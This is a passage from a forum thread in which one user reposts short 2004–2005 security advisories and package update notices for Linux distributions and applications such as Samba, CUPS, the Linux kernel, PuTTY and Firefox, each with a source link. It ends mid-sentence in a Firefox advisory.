Microsoft Corporation: Windows 2000 Professional 
Microsoft Corporation: Windows 2003 Server 
Microsoft Corporation: Windows XP Any version 
MySQL: MaxDB 7.5.00.18 - earlier 
Sun Microsystems: Solaris 8 
Sun Microsystems: Solaris 9 
SuSE: SuSE Linux 8.0 
SuSE: SuSE Linux 9.0 
*

http://xforce.iss.net/xforce/xfdb/18386

eddie


----------



## eddie5659

This update fixes problems occurring on 64-bit platforms

*Product : Fedora Core 2
Name : postgresql-odbc
Version : 7.3
Release : 6.2
*

http://www.linuxsecurity.com/content/view/117447/102/

eddie


----------



## eddie5659

This update fixes problems occurring on 64-bit platforms

*Product : Fedora Core 3
Name : postgresql-odbc
Version : 7.3
Release : 8.FC3.1
*

http://www.linuxsecurity.com/content/view/117448/102/

eddie


----------



## eddie5659

This update synchronizes PostgreSQL for FC2 with the version already released in FC3.

*Product : Fedora Core 2
Name : postgresql
Version : 7.4.6
Release : 1.FC2.1
*

http://www.linuxsecurity.com/content/view/117449/102/

eddie


----------



## eddie5659

A regression has been fixed where strict enforcement of POSIX rules for user and group names prevented Samba 3 from using its "add machine script" feature with useradd. Also, the maximum length for a username/groupname is now 31 (previously it was 32). The lastlog command can now handle extremely large (greater than 4GB) lastlogs.

*Product : Fedora Core 2
Name : shadow-utils
Version : 4.0.3
Release : 55
*

http://www.linuxsecurity.com/content/view/117452/102/

eddie


----------



## eddie5659

A regression has been fixed where strict enforcement of POSIX rules for user and group names prevented Samba 3 from using its "add machine script" feature with useradd. Also, the maximum length for a username/groupname is now 31 (previously it was 32). The lastlog command can now handle extremely large (greater than 4GB) lastlogs.

*Product : Fedora Core 3
Name : shadow-utils
Version : 4.0.3
Release : 56
*

http://www.linuxsecurity.com/content/view/117453/102/

eddie


----------



## eddie5659

Updated imlib packages that fix several integer and buffer overflows are now available.

*2. Relevant releases/architectures:

Red Hat Enterprise Linux AS (Advanced Server) version 2.1 - i386, ia64
Red Hat Linux Advanced Workstation 2.1 - ia64
Red Hat Enterprise Linux ES version 2.1 - i386
Red Hat Enterprise Linux WS version 2.1 - i386
Red Hat Enterprise Linux AS version 3 - i386, ia64, ppc, s390, s390x, x86_64
Red Hat Desktop version 3 - i386, x86_64
Red Hat Enterprise Linux ES version 3 - i386, ia64, x86_64
Red Hat Enterprise Linux WS version 3 - i386, ia64, x86_64
*

http://www.linuxsecurity.com/content/view/117455/110/

eddie


----------



## eddie5659

PHProjekt contains a vulnerability in the setup procedure allowing remote users without admin rights to change the configuration

*Affected packages
=================

-------------------------------------------------------------------
Package / Vulnerable / Unaffected
-------------------------------------------------------------------
1 www-apps/phprojekt < 4.2-r1 >= 4.2-r1
*

http://www.linuxsecurity.com/content/view/117468/104/

eddie


----------



## eddie5659

Numerous issues in the Linux ELF binary loader. Issues relating to IDE DMA transfers which prevent installation on machines with SiS chipsets using the SiS 962/963 IDE controller. Null pointer dereferencing in the SG driver

*Affected Products:
- Turbolinux 10 Server
*

http://www.linuxsecurity.com/content/view/117471/113/

eddie


----------



## eddie5659

MediaWiki is a freely available editing program for Wikipedia, an encyclopedia program, for Linux operating systems. MediaWiki version 1.3.8 and possibly earlier versions could allow a remote attacker to execute arbitrary scripts, caused by improper validation of files uploaded to the 'images' directory inside the Web root directory. A remote attacker could exploit this vulnerability by uploading files to the 'images' directory to execute arbitrary scripts on the system.

*Platforms Affected:

Linux: Linux Any version 
The Wikimedia Foundation, Inc.: MediaWiki 1.3.8 
*

http://xforce.iss.net/xforce/xfdb/18425

eddie


----------



## eddie5659

Two security problems were found by Bartlomiej Sieka. They concern the lppasswd utility, which can be made to cause a denial of service, and the hpgltops filter, which can be exploited to run code remotely as the user "lp". These problems have both been fixed.

*Product : Fedora Core 2
Name : cups
Version : 1.1.20
Release : 11.7
*

http://www.linuxsecurity.com/content/view/117540/102/

eddie


----------



## eddie5659

Two security problems were found by Bartlomiej Sieka. They concern the lppasswd utility, which can be made to cause a denial of service, and the hpgltops filter, which can be exploited to run code remotely as the user "lp". These problems have both been fixed.

*Product : Fedora Core 3
Name : cups
Version : 1.1.22
Release : 0.rc1.8.1
*

http://www.linuxsecurity.com/content/view/117541/102/

eddie


----------



## eddie5659

Update to PyGreSQL 3.6 (to fix bug #142711). Adjust a few file permissions (bug #142431). Assign %{_libdir}/pgsql to base package instead of -server (bug #74003).

*Product : Fedora Core 2
Name : postgresql
Version : 7.4.6
Release : 1.FC2.2
*

http://www.linuxsecurity.com/content/view/117542/102/

eddie


----------



## eddie5659

Update to PyGreSQL 3.6 (to fix bug #142711). Adjust a few file permissions (bug #142431). Assign %{_libdir}/pgsql to base package instead of -server (bug #74003).

*Product : Fedora Core 3
Name : postgresql
Version : 7.4.6
Release : 1.FC3.2
*

http://www.linuxsecurity.com/content/view/117543/102/

eddie


----------



## eddie5659

Samba contains a bug that could lead to remote execution of arbitrary code.

*Affected packages
=================

-------------------------------------------------------------------
Package / Vulnerable / Unaffected
-------------------------------------------------------------------
1 net-fs/samba <= 3.0.9 >= 3.0.9-r1

*

http://www.linuxsecurity.com/content/view/117560/104/

eddie


----------



## eddie5659

KorWeblog is a PHP and MySQL weblog for Linux-based operating systems. KorWeblog versions 1.6.2-cvs and earlier could allow a remote attacker to include malicious PHP files. A remote attacker could send a specially-crafted URL request to the index.php script that uses the lng variable to specify a malicious file from a remote system, which would allow the attacker to execute code on the vulnerable system.

*Platforms Affected:

korweblog: KorWeblog 1.6.2-cvs and prior 
Linux: Linux Any version 
*

http://xforce.iss.net/xforce/xfdb/18717

eddie


----------



## eddie5659

The updated tetex package fixes a buffer overflow which allows attackers to cause the internal xpdf library used by applications in tetex to crash, and possibly to execute arbitrary code. The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned the name CAN-2004-1125 to this issue.

*Product : Fedora Core 2
Name : tetex
Version : 2.0.2
Release : 14FC2.1
*

http://www.linuxsecurity.com/content/view/117742/102/

eddie


----------



## eddie5659

The updated tetex package fixes a buffer overflow which allows attackers to cause the internal xpdf library used by applications in tetex to crash, and possibly to execute arbitrary code. The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned the name CAN-2004-1125 to this issue.

*Product : Fedora Core 3
Name : tetex
Version : 2.0.2
Release : 21.2
*

http://www.linuxsecurity.com/content/view/117743/102/

eddie


----------



## eddie5659

Jonathan Rockway discovered a buffer overflow in nasm, the general-purpose x86 assembler, which could lead to the execution of arbitrary code when compiling a maliciously crafted assembler source file.

http://www.linuxsecurity.com/content/view/117756/100/

eddie


----------



## eddie5659

LinPopUp contains a buffer overflow potentially allowing execution of arbitrary code.

*Affected packages
=================

-------------------------------------------------------------------
Package / Vulnerable / Unaffected
-------------------------------------------------------------------
1 net-im/linpopup < 2.0.4-r1 >= 2.0.4-r1

*

http://www.linuxsecurity.com/content/view/117760/104/

eddie


----------



## eddie5659

The fixps and psmandup scripts in the a2ps package are vulnerable to symlink attacks, potentially allowing a local user to overwrite arbitrary files.

*Affected packages
=================

-------------------------------------------------------------------
Package / Vulnerable / Unaffected
-------------------------------------------------------------------
1 app-text/a2ps < 4.13c-r2 >= 4.13c-r2

*

http://www.linuxsecurity.com/content/view/117761/104/

eddie


----------



## eddie5659

A buffer overflow in o3read allows an attacker to execute arbitrary code by way of a specially crafted XML file.

*Affected packages
=================

-------------------------------------------------------------------
Package / Vulnerable / Unaffected
-------------------------------------------------------------------
1 app-text/o3read <= 0.0.3 >= 0.0.4

*

http://www.linuxsecurity.com/content/view/117867/104/

eddie


----------



## eddie5659

HylaFAX is subject to a vulnerability in its username matching code, potentially allowing remote users to bypass access control lists.

*Affected packages
=================

-------------------------------------------------------------------
Package / Vulnerable / Unaffected
-------------------------------------------------------------------
1 net-misc/hylafax < 4.2.0-r2 >= 4.2.0-r2
*

http://www.linuxsecurity.com/content/view/117868/104/

eddie


----------



## eddie5659

Patrice Fournier discovered a vulnerability in the authorisation subsystem of hylafax, a flexible client/server fax system. A local or remote user guessing the contents of the hosts.hfaxd database could gain unauthorised access to the fax system.

http://www.linuxsecurity.com/content/view/117872/100/

eddie


----------



## eddie5659

poppassd_pam allows anyone to change any user's password without authenticating the user first.

*Affected packages
=================

-------------------------------------------------------------------
Package / Vulnerable / Unaffected
-------------------------------------------------------------------
net-mail/poppassd_ceti <= 1.0 >= 1.8.4
net-mail/poppassd_pam <= 1.0 Vulnerable!
-------------------------------------------------------------------*

http://www.linuxsecurity.com/content/view/117874/104/

eddie


----------



## eddie5659

This update fixes the mounting of usbfs on boot, along with various other accumulated fixes.

*Product : Fedora Core 2
Name : initscripts
Version : 7.55.2 
Release : 1
*

http://www.linuxsecurity.com/content/view/117875/102/

eddie


----------



## eddie5659

An updated nfs-utils package that fixes various security issues is now available.

http://www.linuxsecurity.com/content/view/117896/110/

eddie


----------



## eddie5659

An updated Pine package is now available for Red Hat Enterprise Linux 2.1 to fix a denial of service attack.

http://www.linuxsecurity.com/content/view/117897/110/

eddie


----------



## eddie5659

Updated Xpdf packages that fix several security issues are now available.

http://www.linuxsecurity.com/content/view/117898/110/

eddie


----------



## eddie5659

Allow dhcpd and nscd to read certs files in usr_t. Allow postgresql to use ypbind and fix db creation calls.

*Product : Fedora Core 3
Name : selinux-policy-targeted
Version : 1.17.30
Release : 2.72
*

http://www.linuxsecurity.com/content/view/117899/102/

eddie


----------



## eddie5659

Buffer overflow vulnerabilities, which could lead to arbitrary code execution, have been found in the handling of IPv6 addresses as well as in the SPA authentication mechanism in Exim.

*Affected packages
=================

-------------------------------------------------------------------
Package / Vulnerable / Unaffected
-------------------------------------------------------------------
1 mail-mta/exim < 4.43-r2 >= 4.43-r2

*

http://www.linuxsecurity.com/content/view/117900/104/

eddie


----------



## eddie5659

Linux kernel versions 2.2 through 2.2.27-rc1, 2.4 through 2.4.29-rc1, and 2.6 through 2.6.10 could allow a local attacker to gain elevated privileges on the system, caused by a race condition in the SMP page fault handler.

*Platforms Affected:

kernel.org: Linux kernel 2.2 - 2.2.27-rc1 
kernel.org: Linux kernel 2.4 - 2.4.29-rc1 
kernel.org: Linux kernel 2.6 through 2.6.10 
Linux: Linux Any version
*

http://xforce.iss.net/xforce/xfdb/18849

eddie


----------



## eddie5659

The GIMP User Manual is a newly written User Manual for the GIMP.

*Product : Fedora Core 3
Name : gimp-help
Version : 2
*

http://www.linuxsecurity.com/content/view/117953/102/

eddie


----------



## eddie5659

clip thumbnail quality at 75 and don't barf on saving images at quality 0

*Product : Fedora Core 3
Name  : gimp
Version : 2.2.2
*

http://www.linuxsecurity.com/content/view/117954/102/

eddie


----------



## eddie5659

This is a bug fix update for the Dovecot IMAP server. This brings the Red Hat Dovecot rpm up to date with the latest upstream release from Timo Sirainen, version 0.99.13 released on Jan 6th 2005.

*Product : Fedora Core 3
Name : dovecot
Version : 0.99.13
*

http://www.linuxsecurity.com/content/view/117956/102/

eddie


----------



## eddie5659

A known exploit can break a chroot prison.

*Vulnerable Supported Versions

UnixWare 7.1.4
UnixWare 7.1.3
UnixWare 7.1.1
*

http://www.linuxsecurity.com/content/view/117959/98/

eddie


----------



## eddie5659

MySQL is a popular, freely distributed relational database server often used as a back-end for Web sites. MySQL version 4.x could allow a local attacker to launch a symlink attack, caused by a vulnerability in the mysqlaccess script. The mysqlaccess script creates insecure temporary files. A local attacker could use this vulnerability to create symbolic links from a temporary file to overwrite arbitrary files on the system with user privileges.

*Platforms Affected:

Apple Computer, Inc.: Mac OS Any version 
Cisco Systems, Inc.: Cisco IOS Any version 
Data General: DG/UX Any version 
Hewlett-Packard Company: Compaq Tru64 UNIX Any version 
Hewlett-Packard Company: HP-UX Any version 
http://www.mysql.com/: MySQL 4.x 
IBM: AIX Any version 
IBM: OS/2 Any version 
Linux: Linux Any version 
Microsoft Corporation: Windows 95 
Microsoft Corporation: Windows 98 
Microsoft Corporation: Windows 98 Second Edition 
Microsoft Corporation: Windows Me 
Microsoft Corporation: Windows 2000 Any version 
Microsoft Corporation: Windows 2003 Any version 
Microsoft Corporation: Windows NT 4.0 
Microsoft Corporation: Windows XP Any version 
Novell, Inc.: Novell NetWare Any version 
Santa Cruz Operation, Inc.: SCO Unix Any version 
SGI: IRIX Any version 
Sun Microsystems: Solaris Any version 
Ubuntu and Canonical: Ubuntu 4.10 
Various: Unix Any version 
Wind River Systems, Inc.: BSD Any version
*

http://xforce.iss.net/xforce/xfdb/18922

eddie


----------



## eddie5659

Xelerance has released Openswan 1.0.9. You can download it by http or ftp. This version adds support for RFC 3947 - NAT-T, and a security for XAUTH (note: XAUTH is disabled by default).

Xelerance has released Openswan 2.3.0. You can download it by http or ftp. You can now also use any installer that supports 'repodata.xml', such as Yum, Apt-get, and up2date to easily install openswan. This version adds KLIPS for 2.6 kernels, Aggressive Mode, IKE Mode Config support, Cisco VPN 3xxx client Interop.

http://www.openswan.org/

This is explained in this Bugtraq email:

-----------------

Remote exploitation of a stack based buffer overflow vulnerability in 
Xelerance Corp.'s Openswan could allow attackers to execute arbitrary 
code.

The vulnerability specifically exists due to a lack of bounds checking 
in the pluto application when Openswan is compiled with XAUTH and PAM 
support. The get_internal_addresses() function in 
programs/pluto/xauth.c allocates a small character array and copies an 
overly long user controlled buffer into the array as seen below. The 
resulting stack overflow may be leveraged to execute arbitrary code 
with permissions of the pluto process.

Successful exploitation of the vulnerability can allow remote attackers 
to execute code with privileges of the pluto process. Exploitation in 
the wild will be limited due to the fact that Openswan would need to be 
compiled with XAUTH and PAM options enabled which are both disabled by 
default. In addition, exploitation occurs after an IKE Phase-1 Security 
Association (SA) has been established which requires authentication of 
a shared key and the supplied client certificate, further reducing the 
impact of this vulnerability.

IV. DETECTION

iDEFENSE has confirmed that Openswan 2.2.0 is vulnerable. All previous 
versions of Openswan also contain the vulnerable code.

----

The strange thing is, iDEFENSE say it's for version 2.2.0 and below. OpenSwan released the 2.3 version, so it's best to get that one. Not sure why 1.0.9 is listed as newest.

eddie


----------



## eddie5659

- Apply Steve patch to fix buffer overflow #141761

*Product : Fedora Core 3
Name : kdepim
Version : 3.3.1
*

http://www.linuxsecurity.com/content/view/118175/102/

eddie


----------



## eddie5659

Xpdf is an X Window System based viewer for Portable Document Format (PDF) files. Xpdf is a small and efficient program which uses standard X fonts.

- fix handling CID font encodings in freetype >= 2.1.8 (bug #135066, 
#143948)
- set match as default psPaperSize #141131
- don't link against t1lib, use freetype2 for rendering

*Product : Fedora Core 3
Name : xpdf
Version : 3.00
Release : 10.3
*

http://www.linuxsecurity.com/content/view/118176/102/

eddie


----------



## eddie5659

The kernel package contains the Linux kernel (vmlinuz), the core of any Linux operating system. The kernel handles the basic functions of the operating system: memory allocation, process allocation, device input and output, etc.

*Product : Fedora Core 2
Name : kernel
Version : 2.6.10 
Release : 1.12_FC2
*

http://www.linuxsecurity.com/content/view/118177/102/

eddie


----------



## eddie5659

The kernel package contains the Linux kernel (vmlinuz), the core of any Linux operating system. The kernel handles the basic functions of the operating system: memory allocation, process allocation, device input and output, etc.

*Product : Fedora Core 3
Name : kernel
Version : 2.6.10 
Release : 1.760_FC3
*

http://www.linuxsecurity.com/content/view/118178/102/

eddie


----------



## eddie5659

For the stable distribution (woody) this problem has been fixed in version 2.2.1-4.7. No other version of Python in woody is affected.

*Package : python2.2
*

http://www.linuxsecurity.com/content/view/118182/100/

eddie


----------



## eddie5659

ELOG is a freely available open-source Web-based logbook program for Unix and Linux-based operating systems. ELOG versions 2.5.6 and earlier are vulnerable to a heap-based buffer overflow in the weblog application. A remote attacker could exploit this vulnerability to overflow a buffer and execute arbitrary code on the system.

*Platforms Affected:

Data General: DG/UX Any version 
ELOG: ELOG 2.5.6 and earlier 
Hewlett-Packard Company: Compaq Tru64 UNIX Any version 
Hewlett-Packard Company: HP-UX Any version 
IBM: AIX Any version 
Linux: Linux Any version 
Santa Cruz Operation, Inc.: SCO Unix Any version 
SGI: IRIX Any version 
Sun Microsystems: Solaris Any version 
Wind River Systems, Inc.: BSD Any version 
*

http://xforce.iss.net/xforce/xfdb/19313

eddie


----------



## eddie5659

The toolchain-source, the GNU binutils and GNU C-Compiler (GCC) source code, in Debian Linux version 3.0 could allow a local attacker to launch a symlink attack. The toolchain-source creates insecure temporary files in the /tmp directory. A local attacker could use this vulnerability to create symbolic links from a temporary file to overwrite arbitrary files on the system with user privileges.

*Platforms Affected:

Debian Project: Debian Linux 3.0 
*

http://xforce.iss.net/xforce/xfdb/19317

Regards

eddie


----------



## eddie5659

A bug in the way kioslave handles URL-encoded newline (%0a) characters before the FTP command was discovered. Because of this, it is possible that a specially crafted URL could be used to execute any ftp command on a remote server, or even send unsolicited email.

*Affected versions: 10.0, 10.1, Corporate 3.0
*

http://www.linuxsecurity.com/content/view/118369/106/

eddie


----------



## eddie5659

Problem Description:

New KDE packages are available to address various bugs. The details
are as follows.

Kdebase:

- fix klipper kde bug #75618
- fix konqueror kde bug #66361
- fix kfind kde bug #98423
- fix mozilla session management

Kdenetwork:

- fix kopete kde bug #95804
- fix kget kde bug #92829
- fix kopete kde bug #96304

Kdepim:

- fix kmail header list empty
- fix kmail encrypted email
- fix certmanager aegypt issue 296
- fix kmail kde bug #98463
- fix kmail kde bug #56302
- fix kpgp kde bug #92619
- fix kmail kde bug #98715

Kdeutils:

- fix klaptop "do not allow to overwrite files outside /proc"
- fix kcalc kde bug #98522
- fix kwalleditor incorrect message error
- fix generate menu (kcmlirc) mdk bug #9775
- fix kloppy device name
- fix kdf kde bug #94774
- fix kgpg shredder icons
- fix klaptop: don't provide "kdeutils" bug found by Pascal Terjan

*Affected versions: 10.1
*

http://www.linuxsecurity.com/content/view/118370/106/

eddie


----------



## eddie5659

Previous updates to correct integer overflow issues affecting xpdf overlooked certain conditions when built for a 64 bit platform. (formerly CAN-2004-0888). This also affects applications that use embedded versions of xpdf. The updated packages are patched to deal with these issues.

*Affected versions: 10.0, 10.1, Corporate 3.0,
Corporate Server 2.1
*

http://www.linuxsecurity.com/content/view/118371/106/

eddie


----------



## eddie5659

A number of vulnerabilities were found.

*Affected versions: 10.0, 10.1, Corporate 3.0,
Corporate Server 2.1
*

http://www.linuxsecurity.com/content/view/118372/106/

eddie


----------



## eddie5659

Previous updates to correct integer overflow issues affecting xpdf overlooked certain conditions when built for a 64 bit platform. (formerly CAN-2004-0888). This also affects applications like tetex, that use embedded versions of xpdf. The updated packages are patched to deal with these issues.

*Affected versions: 10.0, 10.1, Corporate 3.0
*

http://www.linuxsecurity.com/content/view/118373/106/

eddie


----------



## eddie5659

Hiya

Gaim is an instant messenger application for Microsoft Windows and Linux-based operating systems. Gaim versions prior to 1.1.3 are vulnerable to a denial of service attack, caused by a vulnerability in the parsing of HTML. By sending specially-crafted HTML, a remote attacker could cause Gaim to crash.

*Platforms Affected:

Gaim Project: Gaim prior to 1.1.3 
Linux: Linux Any version 
Microsoft Corporation: Windows 95 
Microsoft Corporation: Windows 98 
Microsoft Corporation: Windows 98 Second Edition 
Microsoft Corporation: Windows Me 
Microsoft Corporation: Windows XP 
Microsoft Corporation: Windows 2000 Any version 
Microsoft Corporation: Windows 2003 Any version 
Microsoft Corporation: Windows NT 4.0 
*

http://xforce.iss.net/xforce/xfdb/19381

Regards

eddie


----------



## eddie5659

Hiya

Gaim is an instant messenger application for Microsoft Windows and Linux-based operating systems. Gaim versions prior to 1.1.3 are vulnerable to a denial of service attack, caused by a vulnerability in the parsing of SNAC packets. By sending a specially-crafted SNAC packet, a remote attacker could cause Gaim to enter into an infinite loop, resulting in a denial of service.

*Platforms Affected:

Gaim Project: Gaim prior to 1.1.3 
Linux: Linux Any version 
Microsoft Corporation: Windows 95 
Microsoft Corporation: Windows 98 
Microsoft Corporation: Windows 98 Second Edition 
Microsoft Corporation: Windows Me 
Microsoft Corporation: Windows XP 
Microsoft Corporation: Windows 2000 Any version 
Microsoft Corporation: Windows 2003 Any version 
Microsoft Corporation: Windows NT 4.0 
*

http://xforce.iss.net/xforce/xfdb/19380

Regards

eddie


----------



## eddie5659

gprostats, distributed with GProFTPD, is vulnerable to a format string vulnerability, potentially leading to the execution of arbitrary code.

*Affected packages
=================

-------------------------------------------------------------------
Package / Vulnerable / Unaffected
-------------------------------------------------------------------
1 net-ftp/gproftpd < 8.1.9 >= 8.1.9
*

http://www.linuxsecurity.com/content/view/118383/104/

eddie


----------



## eddie5659

Updated package.

http://www.linuxsecurity.com/content/view/118384/100/

eddie


----------



## eddie5659

Updated kernel packages that fix several security issues are now available for Red Hat Enterprise Linux 4. This update has been rated as having important security impact by the Red Hat Security Response Team.

http://www.linuxsecurity.com/content/view/118385/110/

eddie


----------



## eddie5659

This update fixes a number of annoying bugs in gamin especially the Desktop update problem in the GNOME environment that affected a number of users.

*Product : Fedora Core 3
Name : gamin
Version : 0.0.24
*

http://www.linuxsecurity.com/content/view/118386/102/

eddie


----------



## eddie5659

gFTP is vulnerable to directory traversal attacks, possibly leading to the creation or overwriting of arbitrary files.

*Affected packages
=================

-------------------------------------------------------------------
Package / Vulnerable / Unaffected
-------------------------------------------------------------------
1 net-ftp/gftp < 2.0.18-r1 >= 2.0.18-r1

*

http://www.linuxsecurity.com/content/view/118388/104/

eddie


----------



## eddie5659

Ulog-php is a firewall log interface developed in PHP for Unix and Linux-based operating systems. Ulog-php versions prior to 1.0 are vulnerable to SQL injection. By sending a specially-crafted URL request to the host.php, port.php, or index.php script containing SQL code, a remote attacker could obtain sensitive information and add, modify or delete data in the backend database.

*Platforms Affected:

Data General: DG/UX Any version 
Hewlett-Packard Company: Compaq Tru64 UNIX Any version 
Hewlett-Packard Company: HP-UX Any version 
IBM: AIX Any version 
INL: Ulog-php prior to 1.0 
Linux: Linux Any version 
Santa Cruz Operation, Inc.: SCO Unix Any version 
SGI: IRIX Any version 
Sun Microsystems: Solaris Any version 
Wind River Systems, Inc.: BSD Any version 
*

http://xforce.iss.net/xforce/xfdb/19400

eddie


----------



## eddie5659

PuTTY is a Telnet/SSH (Secure Shell) client for Microsoft Windows and Unix-based operating systems. PuTTY versions prior to 0.57 are vulnerable to an integer buffer overflow in the 'fxp_readdir_recv' function in 'sftp.c'. By sending a specially-crafted response to the 'FXP_READDIR' command, a remote attacker could overflow a buffer and execute arbitrary code on the system.

*Platforms Affected:

Data General: DG/UX Any version 
Hewlett-Packard Company: Compaq Tru64 UNIX Any version 
Hewlett-Packard Company: HP-UX Any version 
IBM: AIX Any version 
Linux: Linux Any version 
Microsoft Corporation: Windows 95 
Microsoft Corporation: Windows 98 
Microsoft Corporation: Windows 98 Second Edition 
Microsoft Corporation: Windows Me 
Microsoft Corporation: Windows XP 
Microsoft Corporation: Windows 2000 Any version 
Microsoft Corporation: Windows 2003 Any version 
Microsoft Corporation: Windows NT 4.0 
Santa Cruz Operation, Inc.: SCO Unix Any version 
Simon Tatham: PuTTY prior to 0.57 
Sun Microsystems: Solaris Any version 
Wind River Systems, Inc.: BSD Any version 
*

http://xforce.iss.net/xforce/xfdb/19402

Regards

eddie


----------



## eddie5659

uim is a multilingual input library running on Unix-based operating systems. uim versions prior to 0.4.5.1 could allow a local attacker to gain elevated privileges, caused by a vulnerability with trusted information in the environment variables. If the 'immodule for Qt' is enabled, a local attacker could use this vulnerability to gain elevated privileges on the system, once the libuim is linked with an application that is running setuid/setgid.

*Platforms Affected:

Data General: DG/UX Any version 
Hewlett-Packard Company: Compaq Tru64 UNIX Any version 
Hewlett-Packard Company: HP-UX Any version 
IBM: AIX Any version 
Linux: Linux Any version 
MoinMoin: uim prior to 0.4.5.1 
Santa Cruz Operation, Inc.: SCO Unix Any version 
SGI: IRIX Any version 
Sun Microsystems: Solaris Any version 
Wind River Systems, Inc.: BSD Any version 
*

http://xforce.iss.net/xforce/xfdb/19397

eddie


----------



## eddie5659

fallback-reboot versions prior to 0.995 are vulnerable to a denial of service attack, caused by an unknown error when daemon status is written to a potentially non-existent terminal. A local attacker can exploit this vulnerability to cause a denial of service.

*Platforms Affected:

Dan (unknown): fallback-reboot prior to 0.995 
Linux: Linux Any version 
*

http://xforce.iss.net/xforce/xfdb/19432

eddie


----------



## eddie5659

Updated imap packages to correct a security vulnerability in CRAM-MD5 authentication are now available for Red Hat Enterprise Linux 3. This update has been rated as having moderate security impact by the Red Hat Security Response Team.

http://www.linuxsecurity.com/content/view/118418/110/

eddie


----------



## eddie5659

This update fixes one-byte buffer overruns in the cyrus-imapd IMAP server package.

*Affected products: 8.2, 9.0, 9.1, 9.2
SUSE Linux Enterprise Server 8, 9
*

http://www.linuxsecurity.com/content/view/118423/112/

eddie


----------



## eddie5659

Updated package.

*Product : Fedora Core 3
Name : gimp-help
Version : 2
Release : 0.1.0.7.0.fc3.1
*

http://www.linuxsecurity.com/content/view/118424/102/

eddie


----------



## eddie5659

Takumi ASAKI discovered that uim always trusts environment variables which can allow a local attacker to obtain elevated privileges when libuim is linked against an suid/sgid application. This problem is only exploitable in 'immodule for Qt' enabled Qt applications. The updated packages are patched to fix the problem.

*Affected versions: 10.1
*

http://www.linuxsecurity.com/content/view/118425/106/

eddie


----------



## eddie5659

The squid developers discovered that a remote attacker could cause squid to crash via certain DNS responses. The updated packages are patched to fix the problem.

*Affected versions: 10.0, 10.1, 9.2, Corporate 3.0,
Corporate Server 2.1
*

http://www.linuxsecurity.com/content/view/118426/106/

eddie


----------



## eddie5659

LuxMan is a game for Linux-based operating systems. LuxMan version 0.41-17.1 included with Debian GNU/Linux 3.0 could allow a local attacker to execute arbitrary code on the system, caused by an unknown buffer overflow. A local attacker could exploit this vulnerability to execute arbitrary commands on the system with root privileges.

*Platforms Affected:

Debian Project: Debian Linux 3.0 
*

http://xforce.iss.net/xforce/xfdb/19680

eddie


----------



## eddie5659

Linux Kernel versions 2.6 through 2.6.11 are vulnerable to an integer overflow, caused by improper bounds checking of user-supplied input in the 'sys_epoll_wait' function in eventpoll.c. A local attacker could exploit this vulnerability to overflow a buffer and execute arbitrary code on the system with elevated privileges.

*Platforms Affected:

kernel.org: Linux kernel 2.6 through 2.6.11 
Linux: Linux Any version 
Ubuntu and Canonical: Ubuntu 4.10 
*

http://xforce.iss.net/xforce/xfdb/19701

eddie


----------



## eddie5659

Updated package.

*Product : Fedora Core 3
Name : evolution-data-server
Version : 1.0.4
*

http://www.linuxsecurity.com/content/view/118629/102/

eddie


----------



## eddie5659

Updated package

*Product : Fedora Core 3
Name : evolution-connector
Version : 2.0.4
*

http://www.linuxsecurity.com/content/view/118631/102/

eddie


----------



## eddie5659

Updated package.

*Product : Fedora Core 3
Name : evolution
Version : 2.0.4
*

http://www.linuxsecurity.com/content/view/118630/102/

eddie


----------



## eddie5659

Linux Kernel versions prior to 2.6.12-rc1 are vulnerable to a denial of service attack. A remote authenticated attacker with access to the SCSI tape device could send commands to cause a denial of service.

*Platforms Affected:

Linux: Linux Any version 
The Linux Kernel Archives: Linux Kernel prior to 2.6.12-rc1 
*

http://xforce.iss.net/xforce/xfdb/19739

eddie


----------



## eddie5659

Linux Kernel versions prior to 2.6.12-rc1 are vulnerable to unspecified vulnerabilities in the ISO9660 filesystem handler, including the Rock Ridge and Joliet extensions. A remote attacker could send a specially-crafted filesystem to cause a denial of service or execute arbitrary code on the system.

*Platforms Affected:

Linux: Linux Any version 
The Linux Kernel Archives: Linux Kernel prior to 2.6.12-rc1 
*

http://xforce.iss.net/xforce/xfdb/19741

eddie


----------



## eddie5659

Linux Kernel versions prior to 2.6.12-rc1 are vulnerable to an unspecified vulnerability, caused by improper validation of the ndigis argument of new routes in the ROSE.

*Platforms Affected:

Linux: Linux Any version 
The Linux Kernel Archives: Linux Kernel prior to 2.6.12-rc1 
*

http://xforce.iss.net/xforce/xfdb/19738

eddie


----------



## eddie5659

phpSysInfo is a freely available PHP Script that displays system information for Linux-based operating systems. phpSysInfo version 2.3 and possibly other versions could allow a remote attacker to obtain sensitive information. A remote attacker could send a specially-crafted URL to the specific scripts to cause phpSysInfo to return an error that discloses the full installation path.

*Platforms Affected:

Linux: Linux Any version 
Uriah Welcome [email protected]: phpSysInfo 2.3 
*

http://xforce.iss.net/xforce/xfdb/19808

eddie


----------



## eddie5659

phpSysInfo is a freely available PHP Script that displays system information for Linux-based operating systems. phpSysInfo version 2.3 and possibly other versions are vulnerable to cross-site scripting, caused by improper validation of user-supplied input. If register_globals is enabled, a remote attacker could embed malicious script in the 'sensor_program' parameter in a URL request to the index.php or system_footer.php scripts, which would be executed in the victim's Web browser within the security context of the hosting site, once the link is clicked. An attacker could use this vulnerability to steal the victim's cookie-based authentication credentials.

*Platforms Affected:

Linux: Linux Any version 
Uriah Welcome [email protected]: phpSysInfo 2.3 
*

http://xforce.iss.net/xforce/xfdb/19807

eddie


----------



## eddie5659

Pretty pointless creating an April one now, so adding here 

RealNetworks, Inc. has addressed a recently discovered security vulnerability that offered the potential for an attacker to run arbitrary or malicious code on a customer's machine. RealNetworks has received no reports of machines compromised as a result of the now-remedied vulnerabilities. RealNetworks takes all security vulnerabilities very seriously.

The specific exploit was:

To fashion a malicious RAM file to cause a buffer overflow which could have allowed an attacker to execute arbitrary code on a customer's machine.

*Affected Software

Linux RealPlayer 10 (10.0.0 - 3)
Helix Player (10.0.0 - 3)*

http://service.real.com/help/faq/security/050419_player/EN/

eddie


----------



## eddie5659

Hiya

Bit behind, but going to start this again 

A bug was found in the way Firefox handled synthetic events. It is possible
that Web content could generate events such as keystrokes or mouse clicks
that could be used to steal data or execute malicious JavaScript code. The
Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned
the name CAN-2005-2260 to this issue.

A bug was found in the way Firefox executed Javascript in XBL controls. It
is possible for a malicious webpage to leverage this vulnerability to
execute other JavaScript based attacks even when JavaScript is disabled.
(CAN-2005-2261)

A bug was found in the way Firefox set an image as the desktop wallpaper.
If a user chooses the "Set As Wallpaper..." context menu item on a
specially crafted image, it is possible for an attacker to execute
